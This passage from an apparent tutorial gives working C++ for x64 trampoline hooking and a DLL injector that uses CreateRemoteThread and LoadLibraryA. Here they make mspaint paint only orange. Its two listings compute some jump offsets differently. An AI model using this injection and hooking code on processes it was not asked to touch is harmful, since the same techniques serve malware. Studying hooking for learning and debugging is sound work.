  free(stolenInstrs.instructions);
  return uint32_t(absTableMem - (uint8_t*)dstMemForTrampoline);
}

Step 5: Write the Jump Back to the Hooked Function’s Body

This has been a long process, but we’re almost there. Now we need to fill in the middle of the jump sandwich, and return our trampoline’s size. After all the work we’ve done so far, this last step doesn’t need much explanation. All we need to do is replace the comment in the snippet above with the following:

WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);

When we stole the bytes from func2hook, we also replaced them with NOP instructions. This makes our life easier here, since the jump back to our hooked function doesn’t have to care about the number of bytes we stole. Jumping to the byte immediately after the hook’s jump is guaranteed to be safe.
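
With the jump back in place, it can help to see the whole layout of the hook memory written out as numbers. The sketch below is bookkeeping only. TrampolineLayout and ComputeLayout are names invented for this illustration, and the sizes (13 bytes for an absolute jump, 15 for a call entry) are the ones used by the functions in this post.

```cpp
#include <stdint.h>

//Hypothetical bookkeeping struct: byte offsets from the start of the hook memory
struct TrampolineLayout
{
    uint32_t stolenBytesOffset; //the relocated stolen instructions, always first
    uint32_t jumpBackOffset;    //absolute jump back to the hooked function's body
    uint32_t absTableOffset;    //start of the Absolute Instruction Table
    uint32_t relayOffset;       //where InstallHook() writes the relay function
};

TrampolineLayout ComputeLayout(uint32_t numStolenBytes, uint32_t numRelativeJumps, uint32_t numRelativeCalls)
{
    const uint32_t absJumpSize = 13;      //movabs r10 + jmp r10
    const uint32_t absCallEntrySize = 15; //movabs r10 + call r10 + 2 byte jmp

    TrampolineLayout layout;
    layout.stolenBytesOffset = 0;
    layout.jumpBackOffset = numStolenBytes;
    layout.absTableOffset = layout.jumpBackOffset + absJumpSize;
    layout.relayOffset = layout.absTableOffset
        + numRelativeJumps * absJumpSize
        + numRelativeCalls * absCallEntrySize;
    return layout;
}
```

In the simplest case of 5 stolen bytes and no relative jumps or calls, the jump back starts at offset 5 and both the (empty) table and the relay function start at offset 18. The relayOffset value is the same number that BuildTrampoline() returns.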

Finally we return the byte count of our trampoline, so that InstallHook() can write the relay function into memory right after our trampoline bytes.

void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
  DWORD oldProtect;
  VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

  void* hookMemory = AllocatePageNearAddress(func2hook);
  uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
  *trampolinePtr = hookMemory;

  //create the relay function
  void* relayFuncMemory = (char*)hookMemory + trampolineSize;
  WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

  //install the hook
  uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
  const int32_t relAddr = (int32_t)relayFuncMemory - ((int32_t)func2hook + sizeof(jmpInstruction));
  memcpy(jmpInstruction + 1, &relAddr, 4);
  memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}
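
The only arithmetic in InstallHook() is the operand for the 5 byte jmp, so here’s that step on its own as a sketch with a range check added. MakeRelativeJmp32 is a hypothetical helper that works on plain integers rather than live pointers, and it assumes a little-endian host. The operand is the distance from the end of the jmp to the destination, and it has to fit in a signed 32 bit value, which is the reason the hook memory gets allocated near the target function.

```cpp
#include <stdint.h>
#include <string.h>

//Hypothetical helper: fills `out` with a 5 byte relative jmp that goes from address
//`from` to address `to`. Returns false if `to` is too far away for a 32 bit operand
bool MakeRelativeJmp32(uint64_t from, uint64_t to, uint8_t out[5])
{
    //relative to the end of the 5 byte jmp instruction
    int64_t rel = int64_t(to) - int64_t(from + 5);
    if (rel < INT32_MIN || rel > INT32_MAX)
    {
        return false;
    }

    int32_t rel32 = int32_t(rel);
    out[0] = 0xE9;
    memcpy(out + 1, &rel32, sizeof(rel32));
    return true;
}
```

Jumping from 0x7FF600001000 back to 0x7FF600000000 needs an operand of -0x1005, so the bytes come out as E9 FB EF FF FF. A destination 4 GB away makes the function return false instead of silently writing a truncated operand.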

aaaaand we’re done! The collapsebox below shows the full source for a program that uses this trampoline to hook a function. We’ve already talked about all the fun parts, so I’m going to leave it here without comment and move on to the grand finale.

Full Example of Trampoline Hooking a Function In The Same Process As The Hook Code

#include <stdio.h>
#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>

__declspec(noinline) void TargetFunc(int x, float y)
{
    if (x > 0) printf("Target Func: x > 0\n");
}

void(*TargetFuncTrampoline)(int, float) = nullptr;
void HookPayload(int x, float y)
{
    printf("Hook executed\n");
    TargetFuncTrampoline(x + 1, y);
}

void* AllocatePageNearAddress(void* targetAddr)
{
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

    uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
    //clamp the search range to addresses that a 32 bit relative jump can still reach
    uint64_t minAddr = max(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
    uint64_t maxAddr = min(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

    uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

    uint64_t pageOffset = 1;
    while (1)
    {
        uint64_t byteOffset = pageOffset * PAGE_SIZE;
        uint64_t highAddr = startPage + byteOffset;
        uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

        if (highAddr < maxAddr)
        {
            void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr)
                return outAddr;
        }

        if (lowAddr > minAddr)
        {
            void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr != nullptr)
                return outAddr;
        }

        pageOffset++;

        if (needsExit)
        {
            break;
        }
    }

    return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
    uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x41, 0xFF, 0xE2 };

    uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
    memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
    memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

struct X64Instructions
{
    cs_insn* instructions;
    uint32_t numInstructions;
    uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
    // Disassemble stolen bytes
    csh handle;
    cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
    cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // we need details enabled for relocating RIP relative instrs

    size_t count;
    cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
    count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

    //get the instructions covered by the first 5 bytes of the original function
    uint32_t byteCount = 0;
    uint32_t stolenInstrCount = 0;
    for (int32_t i = 0; i < count; ++i)
    {
        cs_insn& inst = disassembledInstructions[i];
        byteCount += inst.size;
        stolenInstrCount++;
        if (byteCount >= 5) break;
    }

    //replace instructions in target func with NOPs
    memset(function, 0x90, byteCount);

    cs_close(&handle);
    return { disassembledInstructions, stolenInstrCount, byteCount };
}

bool IsRelativeJump(cs_insn& inst)
{
    bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
    bool isJmp = inst.id == X86_INS_JMP;
    bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
    return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

bool IsRelativeCall(cs_insn& inst)
{
    bool isCall = inst.id == X86_INS_CALL;
    bool startsWithE8 = inst.bytes[0] == 0xE8;
    return isCall && startsWithE8;
}

void RewriteJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
    //rewrite the operand for the jump to go to the jump table
    uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
    uint8_t operandSize = instr->size - instrByteSize;

    switch (operandSize)
    {
    case 1: instr->bytes[instrByteSize] = distToJumpTable; break;
    case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
    case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
    }
}


void RewriteCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    //calls need to be rewritten as relative jumps to the abs table
    //but we want to preserve the length of the instruction, so pad with NOPs
    //the jmp sits at the start of the padded instruction, so its offset is measured
    //from the end of the 2 byte jmp, not from the end of the original call
    uint8_t jmpBytes[2] = { 0xEB, 0x0 };
    jmpBytes[1] = uint8_t(absTableEntry - (instrPtr + sizeof(jmpBytes)));
    memset(instr->bytes, 0x90, instr->size);
    memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
    char* targetAddrStr = jmp.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
    WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
    return 13; //size of mov/jmp instrs for absolute jump
}

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
    char* targetAddrStr = call.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

    uint8_t* dstMem = absTableMem;

    uint8_t callAsmBytes[] =
    {
      0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
      0x41, 0xFF, 0xD2, //call r10
    };
    memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
    memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
    dstMem += sizeof(callAsmBytes);

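    //after the call, we need to add a second 2 byte jump, which will jump back to the 
    //final jump of the stolen bytes. Its offset is relative to the end of the jmp itself,
    //which lives at dstMem (right after the call), not at the start of the table entry
    uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (dstMem + sizeof(jmpBytes))) };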
    memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

    return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}

bool IsRIPRelativeInstr(cs_insn& inst)
{
    cs_x86* x86 = &(inst.detail->x86);

    for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
    {
        cs_x86_op* op = &(x86->operands[i]);

        //mem type is rip relative, like lea rcx,[rip+0xbeef]
        if (op->type == X86_OP_MEM)
        {
            //if we're relative to rip
            return op->mem.base == X86_REG_RIP;
        }
    }

    return false;
}

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
    T disp;
    memcpy(&disp, &inst->bytes[offset], sizeof(T));
    return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
    cs_x86* x86 = &(inst->detail->x86);
    uint8_t offset = x86->encoding.disp_offset;

    switch (x86->encoding.disp_size)
    {
    case 1:
    {
        int8_t disp = GetDisplacement<uint8_t>(inst, offset);
        disp -= int8_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 1);
    }break;

    case 2:
    {
        int16_t disp = GetDisplacement<uint16_t>(inst, offset);
        disp -= int16_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 2);
    }break;

    case 4:
    {
        int32_t disp = GetDisplacement<int32_t>(inst, offset);
        disp -= int32_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 4);
    }break;
    }
}

uint32_t BuildTrampoline(void* func2hook, void* dstMemForTrampoline)
{
    X64Instructions stolenInstrs = StealBytes(func2hook);

    uint8_t* stolenByteMem = (uint8_t*)dstMemForTrampoline;
    uint8_t* jumpBackMem = stolenByteMem + stolenInstrs.numBytes;
    uint8_t* absTableMem = jumpBackMem + 13; //13 is the size of a 64 bit mov/jmp instruction pair

    for (uint32_t i = 0; i < stolenInstrs.numInstructions; ++i)
    {
        cs_insn& inst = stolenInstrs.instructions[i];
        if (inst.id >= X86_INS_LOOP && inst.id <= X86_INS_LOOPNE)
        {
            return 0; //bail out on loop instructions, I don't have a good way of handling them 
        }

        if (IsRIPRelativeInstr(inst))
        {
            RelocateInstruction(&inst, stolenByteMem);
        }
        else if (IsRelativeJump(inst))
        {
            uint32_t aitSize = AddJmpToAbsTable(inst, absTableMem);
            RewriteJumpInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        else if (IsRelativeCall(inst))
        {
            uint32_t aitSize = AddCallToAbsTable(inst, absTableMem, jumpBackMem);
            RewriteCallInstruction(&inst, stolenByteMem, absTableMem);
            absTableMem += aitSize;
        }
        memcpy(stolenByteMem, inst.bytes, inst.size);
        stolenByteMem += inst.size;
    }

    WriteAbsoluteJump64(jumpBackMem, (uint8_t*)func2hook + 5);
    free(stolenInstrs.instructions);

    return uint32_t(absTableMem - (uint8_t*)dstMemForTrampoline);
}

void InstallHook(void* func2hook, void* payloadFunc, void** trampolinePtr)
{
    DWORD oldProtect;
    VirtualProtect(func2hook, 1024, PAGE_EXECUTE_READWRITE, &oldProtect);

    void* hookMemory = AllocatePageNearAddress(func2hook);
    uint32_t trampolineSize = BuildTrampoline(func2hook, hookMemory);
    *trampolinePtr = hookMemory;

    //create the relay function
    void* relayFuncMemory = (char*)hookMemory + trampolineSize;
    WriteAbsoluteJump64(relayFuncMemory, payloadFunc); //write relay func instructions

    //install the hook
    uint8_t jmpInstruction[5] = { 0xE9, 0x0, 0x0, 0x0, 0x0 };
    const int32_t relAddr = (int32_t)relayFuncMemory - ((int32_t)func2hook + sizeof(jmpInstruction));
    memcpy(jmpInstruction + 1, &relAddr, 4);
    memcpy(func2hook, jmpInstruction, sizeof(jmpInstruction));
}

int main(int argc, const char** argv)
{
    TargetFunc(argc, 0);
    InstallHook(TargetFunc, HookPayload, (void**)&TargetFuncTrampoline);
    TargetFunc(0, 0);
}

Example 4: Using a Trampoline to Hook a Running Program

Like Po at the end of Kung Fu Panda, it’s time to put all our newfound skills to use and fulfill our destiny of becoming the dragon warrior.

The last example is going to use a trampoline to force mspaint to always use the color orange, no matter what color the user tries to select. This was shown in the gif at the start of the article, but it’s been a long time since then, so here that gif is again:

Mercifully for us, we don’t need to go on an RVA fishing trip this time, because the function we want to hook is exported from a DLL. We’re going to install a hook into gdiplus.dll’s GdipSetSolidFillColor() function. Finding out that this was the right function to hook was pretty much the same process as the last mspaint example: lots of trial and error with breakpoints in x64dbg. A reverse engineer I am not.

So, here’s the plan:

Write a hook payload function that intercepts calls to GdipSetSolidFillColor and replaces the incoming function arguments with the color orange.
Put that payload in a DLL, along with all the hooking logic required to make it happen
Inject that DLL into a running instance of mspaint
Make beautiful artwork with the best color ever.

We’ve already exhaustively walked through a code example that used the same hooking logic that we need to use here. Rather than do that again, let’s focus on what’s different this time. Looking up GdipSetSolidFillColor() gives us this function signature:

GpStatus WINGDIPAPI GdipSetSolidFillColor(Gdiplus::GpSolidFill *brush, Gdiplus::ARGB color)

Recall that the ARGB type is a uint32 with each byte representing a color channel. This means that all our payload needs to do to make things orange is set some bits and pass the new ARGB value to the trampoline:

Gdiplus::GpStatus(*GdipSetSolidFillColorTrampoline)(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color);
Gdiplus::GpStatus GdipSetSolidFillColorPayload(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color)
{
  Gdiplus::ARGB orange = 0xffff7700;
  return GdipSetSolidFillColorTrampoline(brush, orange);
}
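
If the 0xffff7700 literal looks a bit magic, the sketch below spells out how the four channels are packed: alpha in the top byte, followed by red, green and blue. PackARGB is a hypothetical helper written for this illustration and isn’t used by the payload.

```cpp
#include <stdint.h>

//Hypothetical helper showing how an ARGB value is laid out: one byte per channel,
//alpha in the most significant byte and blue in the least significant one
constexpr uint32_t PackARGB(uint8_t a, uint8_t r, uint8_t g, uint8_t b)
{
    return (uint32_t(a) << 24) | (uint32_t(r) << 16) | (uint32_t(g) << 8) | uint32_t(b);
}

//fully opaque, full red, a bit under half green, no blue
static_assert(PackARGB(0xFF, 0xFF, 0x77, 0x00) == 0xFFFF7700, "opaque orange");
```

Swapping in a different color is just a matter of changing the red, green and blue arguments while leaving alpha at 0xFF.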

This isn’t going to be enough to make ALL the possible painting tools spit out orange all the time. The paint can tool, spray paint brushes, etc will still use the colors selected. Our dll will just make most brushes always paint orange, which is good enough for me. It’ll also totally mess with the output of some brushes and make them operate weirdly too, which is fun in its own way.

Here’s a gif demonstrating some of the tools not painting orange, despite our dll being injected into paint:

The hooking logic that we include in the DLL is going to be similar to the trampoline code we wrote for Example 3. The main difference is how we get a pointer to the function we want to hook.

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD ul_reason_for_call, LPVOID lpvReserved)
{
  if (ul_reason_for_call == DLL_PROCESS_ATTACH)
  {
    HMODULE gdiPlusModule = FindModuleInProcess(GetCurrentProcess(), ("gdiplus.dll"));
    void* localHookFunc4 = GetProcAddress(gdiPlusModule, ("GdipSetSolidFillColor"));
    InstallHook(localHookFunc4, GdipSetSolidFillColorPayload, (void**)&GdipSetSolidFillColorTrampoline);
  }
  return true;
}

The FindModuleInProcess() function called above is similar to the GetBaseModuleForProcess() function that we used in a previous example, except that it can look for any loaded module by string name. The function is a bit long, so rather than paste it here, I’ve included it in the complete source for this example. The program used to inject this dll into paint is the same as the one we used before, but it’s also included below.

It took a while to get here, but we’re finally done Example 4! Go celebrate by making beautiful orange artwork!

Full Source For DLL Injector Program

//Injector_LoadLibrary is a dll injector that uses LoadLibraryA to inject a dll into a running process
// usage: Injector_LoadLibrary <process name> <path to dll> 

#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h> //for PROCESSENTRY32, needs to be included after windows.h

void printHelp()
{
    printf("Injector_LoadLibrary\nUsage: Injector_LoadLibrary <process name> <path to dll>\n");
}

void createRemoteThread(DWORD processID, const char* dllPath)
{
    HANDLE handle = OpenProcess(
        PROCESS_QUERY_INFORMATION | //Needed to get a process' token
        PROCESS_CREATE_THREAD |    //for obvious reasons
        PROCESS_VM_OPERATION |    //required to perform operations on address space of process (like WriteProcessMemory)
        PROCESS_VM_WRITE,  //required for WriteProcessMemory
        FALSE,      //don't inherit handle
        processID);

    if (handle == NULL)
    {
        fprintf(stderr, "Could not open process with pid: %lu\n", processID);
        return;
    }

    //once the process is open, we need to write the name of our dll to that process' memory
    size_t dllPathLen = strlen(dllPath) + 1; //+1 so the null terminator gets copied too
    void* dllPathRemote = VirtualAllocEx(
        handle,
        NULL, //let the system decide where to allocate the memory
        dllPathLen,
        MEM_COMMIT, //actually commit the virtual memory
        PAGE_READWRITE); //mem access for committed page

    if (!dllPathRemote)
    {
        fprintf(stderr, "Could not allocate %zu bytes in process with pid: %lu\n", dllPathLen, processID);
        return;
    }

    BOOL writeSucceeded = WriteProcessMemory(
        handle,
        dllPathRemote,
        dllPath,
        dllPathLen,
        NULL);

    if (!writeSucceeded)
    {
        fprintf(stderr, "Could not write %zu bytes to process with pid %lu\n", dllPathLen, processID);
        return;
    }

    //now get address of LoadLibraryA function inside Kernel32.dll
    //TEXT macro "Identifies a string as Unicode when UNICODE is defined by a preprocessor directive during compilation. Otherwise, ANSI string"
    PTHREAD_START_ROUTINE loadLibraryFunc = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32.dll")), "LoadLibraryA");
    if (loadLibraryFunc == NULL)
    {
        fprintf(stderr, "Could not find LoadLibraryA function inside kernel32.dll\n");
        return;
    }

    //now create a thread in remote process that loads our target dll using LoadLibraryA

    HANDLE remoteThread = CreateRemoteThread(
        handle,
        NULL, //default thread security
        0, //stack size for thread
        loadLibraryFunc, //pointer to start of thread function (for us, LoadLibraryA)
        dllPathRemote, //pointer to variable being passed to thread function
        0, //0 means the thread runs immediately after creation
        NULL); //we don't care about getting back the thread identifier

    if (remoteThread == NULL)
    {
        fprintf(stderr, "Could not create remote thread.\n");
        return;
    }
    else
    {
        fprintf(stdout, "Success! remote thread started in process %lu\n", processID);
    }

    // Wait for the remote thread to terminate
    WaitForSingleObject(remoteThread, INFINITE);

    //once we're done, free the memory we allocated in the remote process for the dllPathname, and shut down
    VirtualFreeEx(handle, dllPathRemote, 0, MEM_RELEASE);
    CloseHandle(remoteThread);
    CloseHandle(handle);
}

DWORD findPidByName(const char* name)
{
    HANDLE h;
    PROCESSENTRY32 singleProcess;
    h = CreateToolhelp32Snapshot( //takes a snapshot of specified processes
        TH32CS_SNAPPROCESS, //get all processes
        0); //ignored for SNAPPROCESS

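    singleProcess.dwSize = sizeof(PROCESSENTRY32);

    //Process32First fills in the first entry, without it the first comparison reads uninitialized memory
    if (!Process32First(h, &singleProcess))
    {
        CloseHandle(h);
        return 0;
    }

    do {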

        if (strcmp(singleProcess.szExeFile, name) == 0)
        {
            DWORD pid = singleProcess.th32ProcessID;
            printf("PID Found: %lu\n", pid);
            CloseHandle(h);
            return pid;
        }

    } while (Process32Next(h, &singleProcess));

    CloseHandle(h);

    return 0;
}

int main(int argc, const char** argv)
{
    if (argc != 3)
    {
        printHelp();
        return 1; //argv[1] and argv[2] aren't safe to read without both arguments
    }

    createRemoteThread(findPidByName(argv[1]), argv[2]);

    return 0;
}

Full Source For Example 4

#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>
#include <gdiplus.h>
#include <Psapi.h>
#pragma comment (lib, "Gdiplus.lib")

Gdiplus::GpStatus(*GdipSetSolidFillColorTrampoline)(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color);
Gdiplus::GpStatus GdipSetSolidFillColorPayload(Gdiplus::GpSolidFill* brush, Gdiplus::ARGB color)
{
    Gdiplus::ARGB orange = 0xffff7700;
    return GdipSetSolidFillColorTrampoline(brush, orange);
}

void* AllocatePageNearAddress(void* targetAddr)
{
    SYSTEM_INFO sysInfo;
    GetSystemInfo(&sysInfo);
    const uint64_t PAGE_SIZE = sysInfo.dwPageSize;

    uint64_t startAddr = (uint64_t(targetAddr) & ~(PAGE_SIZE - 1)); //round down to nearest page boundary
    //clamp the search range to addresses that a 32 bit relative jump can still reach
    uint64_t minAddr = max(startAddr - 0x7FFFFF00, (uint64_t)sysInfo.lpMinimumApplicationAddress);
    uint64_t maxAddr = min(startAddr + 0x7FFFFF00, (uint64_t)sysInfo.lpMaximumApplicationAddress);

    uint64_t startPage = (startAddr - (startAddr % PAGE_SIZE));

    uint64_t pageOffset = 1;
    while (1)
    {
        uint64_t byteOffset = pageOffset * PAGE_SIZE;
        uint64_t highAddr = startPage + byteOffset;
        uint64_t lowAddr = (startPage > byteOffset) ? startPage - byteOffset : 0;

        bool needsExit = highAddr > maxAddr && lowAddr < minAddr;

        if (highAddr < maxAddr)
        {
            void* outAddr = VirtualAlloc((void*)highAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr)
                return outAddr;
        }

        if (lowAddr > minAddr)
        {
            void* outAddr = VirtualAlloc((void*)lowAddr, PAGE_SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (outAddr != nullptr)
                return outAddr;
        }

        pageOffset++;

        if (needsExit)
        {
            break;
        }
    }

    return nullptr;
}

void WriteAbsoluteJump64(void* absJumpMemory, void* addrToJumpTo)
{
    uint8_t absJumpInstructions[] = { 0x49, 0xBA, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                      0x41, 0xFF, 0xE2 };

    uint64_t addrToJumpTo64 = (uint64_t)addrToJumpTo;
    memcpy(&absJumpInstructions[2], &addrToJumpTo64, sizeof(addrToJumpTo64));
    memcpy(absJumpMemory, absJumpInstructions, sizeof(absJumpInstructions));
}

struct X64Instructions
{
    cs_insn* instructions;
    uint32_t numInstructions;
    uint32_t numBytes;
};

X64Instructions StealBytes(void* function)
{
    // Disassemble stolen bytes
    csh handle;
    cs_open(CS_ARCH_X86, CS_MODE_64, &handle);
    cs_option(handle, CS_OPT_DETAIL, CS_OPT_ON); // we need details enabled for relocating RIP relative instrs

    size_t count;
    cs_insn* disassembledInstructions; //allocated by cs_disasm, needs to be manually freed later
    count = cs_disasm(handle, (uint8_t*)function, 20, (uint64_t)function, 20, &disassembledInstructions);

    //get the instructions covered by the first 5 bytes of the original function
    uint32_t byteCount = 0;
    uint32_t stolenInstrCount = 0;
    for (int32_t i = 0; i < count; ++i)
    {
        cs_insn& inst = disassembledInstructions[i];
        byteCount += inst.size;
        stolenInstrCount++;
        if (byteCount >= 5) break;
    }

    //replace instructions in target func with NOPs
    memset(function, 0x90, byteCount);

    cs_close(&handle);
    return { disassembledInstructions, stolenInstrCount, byteCount };
}

bool IsRelativeJump(cs_insn& inst)
{
    bool isAnyJumpInstruction = inst.id >= X86_INS_JAE && inst.id <= X86_INS_JS;
    bool isJmp = inst.id == X86_INS_JMP;
    bool startsWithEBorE9 = inst.bytes[0] == 0xEB || inst.bytes[0] == 0xE9;
    return isJmp ? startsWithEBorE9 : isAnyJumpInstruction;
}

bool IsRelativeCall(cs_insn& inst)
{
    bool isCall = inst.id == X86_INS_CALL;
    bool startsWithE8 = inst.bytes[0] == 0xE8;
    return isCall && startsWithE8;
}

void RewriteJumpInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand
    //rewrite the operand for the jump to go to the jump table
    uint8_t instrByteSize = instr->bytes[0] == 0x0F ? 2 : 1;
    uint8_t operandSize = instr->size - instrByteSize;

    switch (operandSize)
    {
    case 1: instr->bytes[instrByteSize] = distToJumpTable; break;
    case 2: {uint16_t dist16 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist16, 2); } break;
    case 4: {uint32_t dist32 = distToJumpTable; memcpy(&instr->bytes[instrByteSize], &dist32, 4); } break;
    }
}


void RewriteCallInstruction(cs_insn* instr, uint8_t* instrPtr, uint8_t* absTableEntry)
{
    uint8_t distToJumpTable = uint8_t(absTableEntry - (instrPtr + instr->size));

    //calls need to be rewritten as relative jumps to the abs table
    //but we want to preserve the length of the instruction, so pad with NOPs
    uint8_t jmpBytes[2] = { 0xEB, distToJumpTable };
    memset(instr->bytes, 0x90, instr->size);
    memcpy(instr->bytes, jmpBytes, sizeof(jmpBytes));
}

uint32_t AddJmpToAbsTable(cs_insn& jmp, uint8_t* absTableMem)
{
    char* targetAddrStr = jmp.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);
    WriteAbsoluteJump64(absTableMem, (void*)targetAddr);
    return 13; //size of mov/jmp instrs for absolute jump
}

uint32_t AddCallToAbsTable(cs_insn& call, uint8_t* absTableMem, uint8_t* jumpBackToHookedFunc)
{
    char* targetAddrStr = call.op_str; //where the instruction intended to go
    uint64_t targetAddr = _strtoui64(targetAddrStr, NULL, 0);

    uint8_t* dstMem = absTableMem;

    uint8_t callAsmBytes[] =
    {
      0x49, 0xBA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, //movabs 64 bit value into r10
      0x41, 0xFF, 0xD2, //call r10
    };
    memcpy(&callAsmBytes[2], &targetAddr, sizeof(void*));
    memcpy(dstMem, &callAsmBytes, sizeof(callAsmBytes));
    dstMem += sizeof(callAsmBytes);

    //after the call, we need to add a second 2 byte jump, which will jump back to the 
      //final jump of the stolen bytes
    uint8_t jmpBytes[2] = { 0xEB, uint8_t(jumpBackToHookedFunc - (absTableMem + sizeof(jmpBytes))) };
    memcpy(dstMem, jmpBytes, sizeof(jmpBytes));

    return sizeof(callAsmBytes) + sizeof(jmpBytes); //15
}

bool IsRIPRelativeInstr(cs_insn& inst)
{
    cs_x86* x86 = &(inst.detail->x86);

    for (uint32_t i = 0; i < inst.detail->x86.op_count; i++)
    {
        cs_x86_op* op = &(x86->operands[i]);

        //mem type is rip relative, like lea rcx,[rip+0xbeef]
        if (op->type == X86_OP_MEM)
        {
            //if we're relative to rip
            return op->mem.base == X86_REG_RIP;
        }
    }

    return false;
}

template<class T>
T GetDisplacement(cs_insn* inst, uint8_t offset)
{
    T disp;
    memcpy(&disp, &inst->bytes[offset], sizeof(T));
    return disp;
}

//rewrite instruction bytes so that any RIP-relative displacement operands
//make sense with wherever we're relocating to
void RelocateInstruction(cs_insn* inst, void* dstLocation)
{
    cs_x86* x86 = &(inst->detail->x86);
    uint8_t offset = x86->encoding.disp_offset;

    uint64_t displacement = inst->bytes[x86->encoding.disp_offset];
    switch (x86->encoding.disp_size)
    {
    case 1:
    {
        int8_t disp = GetDisplacement<uint8_t>(inst, offset);
        disp -= int8_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 1);
    }break;

    case 2:
    {
        int16_t disp = GetDisplacement<uint16_t>(inst, offset);
        disp -= int16_t(uint64_t(dstLocation) - inst->address);
        memcpy(&inst->bytes[offset], &disp, 2);
    }break;

    case 4:
    {
        int32_t disp = GetDisplacement<int32_t>(inst, offset);
